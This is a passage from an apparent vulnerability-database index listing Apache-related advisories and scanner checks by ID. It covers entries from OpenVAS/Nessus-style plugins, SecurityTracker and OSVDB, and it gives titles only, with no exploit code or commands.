12830| [65228] SLES9: Security update for Apache 2
12831| [65212] SLES9: Security update for apache2-mod_python
12832| [65209] SLES9: Security update for apache2-worker
12833| [65207] SLES9: Security update for Apache 2
12834| [65168] SLES9: Security update for apache2-mod_python
12835| [65142] SLES9: Security update for Apache2
12836| [65136] SLES9: Security update for Apache 2
12837| [65132] SLES9: Security update for apache
12838| [65131] SLES9: Security update for Apache 2 oes/CORE
12839| [65113] SLES9: Security update for apache2
12840| [65072] SLES9: Security update for apache and mod_ssl
12841| [65017] SLES9: Security update for Apache 2
12842| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
12843| [64783] FreeBSD Ports: apache
12844| [64774] Ubuntu USN-802-2 (apache2)
12845| [64653] Ubuntu USN-813-2 (apache2)
12846| [64559] Debian Security Advisory DSA 1834-2 (apache2)
12847| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
12848| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
12849| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
12850| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
12851| [64443] Ubuntu USN-802-1 (apache2)
12852| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
12853| [64423] Debian Security Advisory DSA 1834-1 (apache2)
12854| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
12855| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
12856| [64251] Debian Security Advisory DSA 1816-1 (apache2)
12857| [64201] Ubuntu USN-787-1 (apache2)
12858| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
12859| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
12860| [63565] FreeBSD Ports: apache
12861| [63562] Ubuntu USN-731-1 (apache2)
12862| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
12863| [61185] FreeBSD Ports: apache
12864| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
12865| [60387] Slackware Advisory SSA:2008-045-02 apache
12866| [58826] FreeBSD Ports: apache-tomcat
12867| [58825] FreeBSD Ports: apache-tomcat
12868| [58804] FreeBSD Ports: apache
12869| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
12870| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
12871| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
12872| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
12873| [57335] Debian Security Advisory DSA 1167-1 (apache)
12874| [57201] Debian Security Advisory DSA 1131-1 (apache)
12875| [57200] Debian Security Advisory DSA 1132-1 (apache2)
12876| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
12877| [57145] FreeBSD Ports: apache
12878| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
12879| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
12880| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
12881| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
12882| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
12883| [56067] FreeBSD Ports: apache
12884| [55803] Slackware Advisory SSA:2005-310-04 apache
12885| [55519] Debian Security Advisory DSA 839-1 (apachetop)
12886| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
12887| [55355] FreeBSD Ports: apache
12888| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
12889| [55261] Debian Security Advisory DSA 805-1 (apache2)
12890| [55259] Debian Security Advisory DSA 803-1 (apache)
12891| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
12892| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
12893| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
12894| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
12895| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
12896| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
12897| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
12898| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
12899| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
12900| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
12901| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
12902| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
12903| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
12904| [54439] FreeBSD Ports: apache
12905| [53931] Slackware Advisory SSA:2004-133-01 apache
12906| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
12907| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
12908| [53878] Slackware Advisory SSA:2003-308-01 apache security update
12909| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
12910| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
12911| [53848] Debian Security Advisory DSA 131-1 (apache)
12912| [53784] Debian Security Advisory DSA 021-1 (apache)
12913| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
12914| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
12915| [53735] Debian Security Advisory DSA 187-1 (apache)
12916| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
12917| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
12918| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
12919| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
12920| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
12921| [53282] Debian Security Advisory DSA 594-1 (apache)
12922| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
12923| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
12924| [53215] Debian Security Advisory DSA 525-1 (apache)
12925| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
12926| [52529] FreeBSD Ports: apache+ssl
12927| [52501] FreeBSD Ports: apache
12928| [52461] FreeBSD Ports: apache
12929| [52390] FreeBSD Ports: apache
12930| [52389] FreeBSD Ports: apache
12931| [52388] FreeBSD Ports: apache
12932| [52383] FreeBSD Ports: apache
12933| [52339] FreeBSD Ports: apache+mod_ssl
12934| [52331] FreeBSD Ports: apache
12935| [52329] FreeBSD Ports: ru-apache+mod_ssl
12936| [52314] FreeBSD Ports: apache
12937| [52310] FreeBSD Ports: apache
12938| [15588] Detect Apache HTTPS
12939| [15555] Apache mod_proxy content-length buffer overflow
12940| [15554] Apache mod_include priviledge escalation
12941| [14771] Apache <= 1.3.33 htpasswd local overflow
12942| [14177] Apache mod_access rule bypass
12943| [13644] Apache mod_rootme Backdoor
12944| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
12945| [12280] Apache Connection Blocking Denial of Service
12946| [12239] Apache Error Log Escape Sequence Injection
12947| [12123] Apache Tomcat source.jsp malformed request information disclosure
12948| [12085] Apache Tomcat servlet/JSP container default files
12949| [11438] Apache Tomcat Directory Listing and File disclosure
12950| [11204] Apache Tomcat Default Accounts
12951| [11092] Apache 2.0.39 Win32 directory traversal
12952| [11046] Apache Tomcat TroubleShooter Servlet Installed
12953| [11042] Apache Tomcat DOS Device Name XSS
12954| [11041] Apache Tomcat /servlet Cross Site Scripting
12955| [10938] Apache Remote Command Execution via .bat files
12956| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
12957| [10773] MacOS X Finder reveals contents of Apache Web files
12958| [10766] Apache UserDir Sensitive Information Disclosure
12959| [10756] MacOS X Finder reveals contents of Apache Web directories
12960| [10752] Apache Auth Module SQL Insertion Attack
12961| [10704] Apache Directory Listing
12962| [10678] Apache /server-info accessible
12963| [10677] Apache /server-status accessible
12964| [10440] Check for Apache Multiple / vulnerability
12965|
12966| SecurityTracker - https://www.securitytracker.com:
12967| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
12968| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
12969| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
12970| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
12971| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
12972| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
12973| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
12974| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
12975| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
12976| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
12977| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
12978| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
12979| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
12980| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
12981| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
12982| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
12983| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
12984| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
12985| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
12986| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
12987| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
12988| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
12989| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
12990| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
12991| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
12992| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
12993| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
12994| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
12995| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
12996| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
12997| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
12998| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
12999| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
13000| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
13001| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
13002| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
13003| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
13004| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
13005| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
13006| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
13007| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
13008| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
13009| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
13010| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
13011| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
13012| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
13013| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
13014| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
13015| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
13016| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
13017| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
13018| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
13019| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
13020| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
13021| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
13022| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
13023| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
13024| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
13025| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
13026| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
13027| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
13028| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
13029| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
13030| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
13031| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
13032| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
13033| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
13034| [1024096] Apache mod_proxy_http May Return Results for a Different Request
13035| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
13036| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
13037| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
13038| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
13039| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
13040| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
13041| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
13042| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
13043| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
13044| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
13045| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
13046| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
13047| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
13048| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
13049| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
13050| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
13051| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
13052| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
13053| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
13054| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
13055| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
13056| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
13057| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
13058| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
13059| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
13060| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
13061| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
13062| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
13063| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
13064| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
13065| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
13066| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
13067| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
13068| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
13069| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
13070| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
13071| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
13072| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
13073| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
13074| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
13075| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
13076| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
13077| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
13078| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
13079| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
13080| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
13081| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
13082| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
13083| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
13084| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
13085| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
13086| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
13087| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
13088| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
13089| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
13090| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
13091| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
13092| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
13093| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
13094| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
13095| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
13096| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
13097| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
13098| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
13099| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
13100| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
13101| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
13102| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
13103| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
13104| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
13105| [1008920] Apache mod_digest May Validate Replayed Client Responses
13106| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
13107| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
13108| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
13109| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
13110| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
13111| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
13112| [1008030] Apache mod_rewrite Contains a Buffer Overflow
13113| [1008029] Apache mod_alias Contains a Buffer Overflow
13114| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
13115| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
13116| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
13117| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
13118| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
13119| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
13120| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
13121| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
13122| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
13123| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
13124| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
13125| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
13126| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
13127| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
13128| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
13129| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
13130| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
13131| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
13132| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
13133| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
13134| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
13135| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
13136| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
13137| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
13138| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
13139| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
13140| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
13141| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
13142| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
13143| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
13144| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
13145| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
13146| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
13147| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
13148| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
13149| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
13150| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
13151| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
13152| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
13153| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
13154| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
13155| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
13156| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
13157| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
13158| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
13159| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
13160| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
13161| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
13162| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
13163| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
13164| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
13165| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
13166| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
13167| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
13168| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
13169| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
13170|
13171| OSVDB - http://www.osvdb.org:
13172| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
13173| [96077] Apache CloudStack Global Settings Multiple Field XSS
13174| [96076] Apache CloudStack Instances Menu Display Name Field XSS
13175| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
13176| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
13177| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
13178| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
13179| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
13180| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
13181| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
13182| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
13183| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
13184| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
13185| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
13186| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
13187| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
13188| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
13189| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
13190| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
13191| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
13192| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
13193| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
13194| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
13195| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
13196| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
13197| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
13198| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
13199| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
13200| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
13201| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
13202| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
13203| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
13204| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
13205| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
